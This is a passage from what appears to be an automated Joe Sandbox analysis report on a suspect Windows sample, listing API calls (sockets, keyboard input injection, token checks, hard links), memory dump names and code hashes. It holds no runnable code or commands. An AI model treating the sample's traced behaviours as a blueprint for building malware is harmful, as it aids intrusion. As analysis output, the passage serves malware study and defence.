                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: BuffCharLower$AllocVirtual_memmove
                    • String ID:
                    • API String ID: 3659485706-0
                    • Opcode ID: f231e996e9e156ca12c405c25939735b948a3b742daaed21ada44fdcea3ace85
                    • Instruction ID: 43a8499c57541343d1cd2e79a46bd2c9f4daf03074f50010545482882345b3cf
                    • Opcode Fuzzy Hash: f231e996e9e156ca12c405c25939735b948a3b742daaed21ada44fdcea3ace85
                    • Instruction Fuzzy Hash: 5BC15A71608301DFC714DF28C484AAABBE4FF89318F14896DF89A9B351D739E945CB82
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 007B83D8
                    • CoUninitialize.OLE32 ref: 007B83E3
                      • Part of subcall function 0079DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0079DAC5
                    • VariantInit.OLEAUT32(?), ref: 007B83EE
                    • VariantClear.OLEAUT32(?), ref: 007B86BF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                    • String ID:
                    • API String ID: 780911581-0
                    • Opcode ID: fd9736c400b4c6520fa637f05965f616a5d0065658bc63f1a4a9ca1dd26c4709
                    • Instruction ID: 180cf97192cebc67cb08651267987d26e807fe6d8bf29bdb1cad9ec960f77366
                    • Opcode Fuzzy Hash: fd9736c400b4c6520fa637f05965f616a5d0065658bc63f1a4a9ca1dd26c4709
                    • Instruction Fuzzy Hash: 22A11775204701DFCB50DF24C889B5AB7E9BF89314F148449FA9A9B3A2CB38ED04CB56
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Variant$AllocClearCopyInitString
                    • String ID:
                    • API String ID: 2808897238-0
                    • Opcode ID: 0a7758182aad1ba238ca15d1d92f52f75f91d4a582b602b19f787dabd0c13ff9
                    • Instruction ID: 1ec985bd3566e0afe4e0fa437ffaa3fbe783625fdbfd76c8eecdada399718c70
                    • Opcode Fuzzy Hash: 0a7758182aad1ba238ca15d1d92f52f75f91d4a582b602b19f787dabd0c13ff9
                    • Instruction Fuzzy Hash: 5551B870614301DADF28AF69F895A7AB3E5AF48310F24881FF556CB291EB7C9840DB15
                    APIs
                    • GetWindowRect.USER32(0168E838,?), ref: 007C9AD2
                    • ScreenToClient.USER32(00000002,00000002), ref: 007C9B05
                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 007C9B72
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Window$ClientMoveRectScreen
                    • String ID:
                    • API String ID: 3880355969-0
                    • Opcode ID: fd0f05cfaf8a5909ef1806ac14a5969485805dd0530763119ec1e314a0dd144f
                    • Instruction ID: 27e20a84c5cdbde60fe8300d68f0a6f94c5ca3fc151ebd1653d65dfbbacfed56
                    • Opcode Fuzzy Hash: fd0f05cfaf8a5909ef1806ac14a5969485805dd0530763119ec1e314a0dd144f
                    • Instruction Fuzzy Hash: 9D512C75A00209EFCF54DF68D885EAE7BB6FB44320F14826DF9159B290D734AD91CB90
                    APIs
                    • socket.WSOCK32(00000002,00000002,00000011), ref: 007B6CE4
                    • WSAGetLastError.WSOCK32(00000000), ref: 007B6CF4
                      • Part of subcall function 00749997: __itow.LIBCMT ref: 007499C2
                      • Part of subcall function 00749997: __swprintf.LIBCMT ref: 00749A0C
                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 007B6D58
                    • WSAGetLastError.WSOCK32(00000000), ref: 007B6D64
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ErrorLast$__itow__swprintfsocket
                    • String ID:
                    • API String ID: 2214342067-0
                    • Opcode ID: 5ae3e4e3c2ee8b4a3fac4982931aca8101bbb585ec9d586b0b7e9835481cd5ab
                    • Instruction ID: de717408f3c0321d70261cf6f974bde7dd4272a097acb06b489aa635bd33f4d2
                    • Opcode Fuzzy Hash: 5ae3e4e3c2ee8b4a3fac4982931aca8101bbb585ec9d586b0b7e9835481cd5ab
                    • Instruction Fuzzy Hash: 69418174740214AFEB10AF24DC8AF7A77E5DB44B10F44C018FA599F2D2DB799D008791
                    APIs
                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,007CF910), ref: 007B67BA
                    • _strlen.LIBCMT ref: 007B67EC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID:
                    • API String ID: 4218353326-0
                    • Opcode ID: abefac51adfa6c824d1dddce19610dab01841007b0a6b593c5ec2fda9be60235
                    • Instruction ID: 6f84e75a3600b34b5ba9aa52235fe66aa6ff01601fe0552fb9957afcccc71844
                    • Opcode Fuzzy Hash: abefac51adfa6c824d1dddce19610dab01841007b0a6b593c5ec2fda9be60235
                    • Instruction Fuzzy Hash: DE417371A00104EBCB14EB64DCD9FEEB7A9EF44314F148169F91697292DB3CAD04CB51
                    APIs
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 007ABB09
                    • GetLastError.KERNEL32(?,00000000), ref: 007ABB2F
                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007ABB54
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007ABB80
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: CreateHardLink$DeleteErrorFileLast
                    • String ID:
                    • API String ID: 3321077145-0
                    • Opcode ID: bde92f1a995597a309addf5f384cc3381ea8125c95e44c4ed156cad2234e0617
                    • Instruction ID: dea44eede118e632b0ebba4f1151a5ec9b9edf45f8fa1b07ef49f36a81f7bbd9
                    • Opcode Fuzzy Hash: bde92f1a995597a309addf5f384cc3381ea8125c95e44c4ed156cad2234e0617
                    • Instruction Fuzzy Hash: 4B410839200610DFCB11EF15C589A5EBBE5EF8A310B19C498F94A9B762CB39FD01CB91
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007C8B4D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    • Opcode ID: 57c0f458dfb378e4d6ccc277322050a7109186254c1926058ac28ddd4d47749d
                    • Instruction ID: 064b6a8e7b7ed74d2a83848141470e2e2129b371ec4de6f32f31c72d5131101a
                    • Opcode Fuzzy Hash: 57c0f458dfb378e4d6ccc277322050a7109186254c1926058ac28ddd4d47749d
                    • Instruction Fuzzy Hash: 4A3192F4600208BEEFA09F18CC45FA977A5FB05310F64861EFA51D72A1DF38AD609752
                    APIs
                    • ClientToScreen.USER32(?,?), ref: 007CAE1A
                    • GetWindowRect.USER32(?,?), ref: 007CAE90
                    • PtInRect.USER32(?,?,007CC304), ref: 007CAEA0
                    • MessageBeep.USER32(00000000), ref: 007CAF11
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Rect$BeepClientMessageScreenWindow
                    • String ID:
                    • API String ID: 1352109105-0
                    • Opcode ID: dda71af567bcc0fffc9fa9bb2dfed7b9bfc88172f56b68d5e8a486bfbd8ccfa2
                    • Instruction ID: 681faf3f97d6a49c17097dcaac1cba3f7d94e1cc7567c668d35a167a4abedbf2
                    • Opcode Fuzzy Hash: dda71af567bcc0fffc9fa9bb2dfed7b9bfc88172f56b68d5e8a486bfbd8ccfa2
                    • Instruction Fuzzy Hash: 5E418870A0021DEFCB11CF58C885FA9BBF5FB4831AF1881ADE9149B251D734E951DB92
                    APIs
                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 007A1037
                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 007A1053
                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 007A10B9
                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 007A110B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    • Opcode ID: 5aebcbe4e71039e710d8fdbc94152c4d2b7df0b222423188a534415f60ecbbb2
                    • Instruction ID: 9a2fa4bacc625aec9e639b317d9b27feb7ad831f2f6c5f23f0021b599eac9034
                    • Opcode Fuzzy Hash: 5aebcbe4e71039e710d8fdbc94152c4d2b7df0b222423188a534415f60ecbbb2
                    • Instruction Fuzzy Hash: 43314B30E44698AEFB308B658C09BFBBBA9ABC7310F84431AE580521D1C37D8DD09765
                    APIs
                    • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 007A1176
                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 007A1192
                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 007A11F1
                    • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 007A1243
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    • Opcode ID: f287b15f14dcff7cae0b19c79d652a5545a6325f374fcc173a4f3d0005e3348f
                    • Instruction ID: 599be86e2c8a387065de5cfefd964dc80f79178c017a6f805a7d5ca14404a14d
                    • Opcode Fuzzy Hash: f287b15f14dcff7cae0b19c79d652a5545a6325f374fcc173a4f3d0005e3348f
                    • Instruction Fuzzy Hash: 51310730A4061C9EFF208B65CC08BFA7BAAABCB310F84835BE681921D1C33C89559755
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0077644B
                    • __isleadbyte_l.LIBCMT ref: 00776479
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007764A7
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007764DD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID:
                    • API String ID: 3058430110-0
                    • Opcode ID: 053d1f1ebf17b2609d26402f51b03d66bae203295da81e7608253cf96509064b
                    • Instruction ID: 448650c9cea9f07ea6d3f50b3ddecb4510d2c23035d2934c3640a9b644b0daba
                    • Opcode Fuzzy Hash: 053d1f1ebf17b2609d26402f51b03d66bae203295da81e7608253cf96509064b
                    • Instruction Fuzzy Hash: EF310F30600A86EFDF218F75CC44BAA7BA5FF01390F198028E859871A4EB39DA50DB90
                    APIs
                    • GetForegroundWindow.USER32 ref: 007C5189
                      • Part of subcall function 007A387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007A3897
                      • Part of subcall function 007A387D: GetCurrentThreadId.KERNEL32 ref: 007A389E
                      • Part of subcall function 007A387D: AttachThreadInput.USER32(00000000,?,007A52A7), ref: 007A38A5
                    • GetCaretPos.USER32(?), ref: 007C519A
                    • ClientToScreen.USER32(00000000,?), ref: 007C51D5
                    • GetForegroundWindow.USER32 ref: 007C51DB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                    • String ID:
                    • API String ID: 2759813231-0
                    • Opcode ID: f03dd68f6b6f3ba1a99106006802de582e94726120aba08673c4085d8b2e613d
                    • Instruction ID: f916372c3e42ac5e26290a3bd6e012d219a4aef073d3ba57f4945dbf5f9b99bb
                    • Opcode Fuzzy Hash: f03dd68f6b6f3ba1a99106006802de582e94726120aba08673c4085d8b2e613d
                    • Instruction Fuzzy Hash: 8331F071900108AFDB04EFA5C849EEFB7F9EF98300F10806AE515E7251EB799E45CBA0
                    APIs
                      • Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623
                    • GetCursorPos.USER32(?), ref: 007CC7C2
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0077BBFB,?,?,?,?,?), ref: 007CC7D7
                    • GetCursorPos.USER32(?), ref: 007CC824
                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0077BBFB,?,?,?), ref: 007CC85E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                    • String ID:
                    • API String ID: 2864067406-0
                    • Opcode ID: 5dfeb6d511cfe96b213ea931267b136135adc23226bfc5cf8af9d16994310498
                    • Instruction ID: 98e90e9a1efc61bd0a8da79900e9670005a813e275cb16894e3d1eb98ac0fb2a
                    • Opcode Fuzzy Hash: 5dfeb6d511cfe96b213ea931267b136135adc23226bfc5cf8af9d16994310498
                    • Instruction Fuzzy Hash: AA317E35600018AFCB16CF58D898EEB7BFAFB49310F04816DF9098B261D7399D61DBA0
                    APIs
                    • __setmode.LIBCMT ref: 00760BF2
                      • Part of subcall function 00745B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007A7B20,?,?,00000000), ref: 00745B8C
                      • Part of subcall function 00745B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007A7B20,?,?,00000000,?,?), ref: 00745BB0
                    • _fprintf.LIBCMT ref: 00760C29
                    • OutputDebugStringW.KERNEL32(?), ref: 00796331
                      • Part of subcall function 00764CDA: _flsall.LIBCMT ref: 00764CF3
                    • __setmode.LIBCMT ref: 00760C5E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                    • String ID:
                    • API String ID: 521402451-0
                    • Opcode ID: 2c17b288cff33d250fbcfb4b91d0bd52e3593ac8805aa85e09f7415bea067be5
                    • Instruction ID: 0ea971a7a87451b0854ade0394634c604bc3e996e825a9a7248318b05bdeb86b
                    • Opcode Fuzzy Hash: 2c17b288cff33d250fbcfb4b91d0bd52e3593ac8805aa85e09f7415bea067be5
                    • Instruction Fuzzy Hash: 39112432A04204FFCB05B7B4AC4A9BE7B69DF81320F14421AF60657292EF2C2D5597A5
                    APIs
                      • Part of subcall function 00798652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00798669
                      • Part of subcall function 00798652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00798673
                      • Part of subcall function 00798652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00798682
                      • Part of subcall function 00798652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00798689
                      • Part of subcall function 00798652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0079869F
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00798BEB
                    • _memcmp.LIBCMT ref: 00798C0E
                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00798C44
                    • HeapFree.KERNEL32(00000000), ref: 00798C4B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
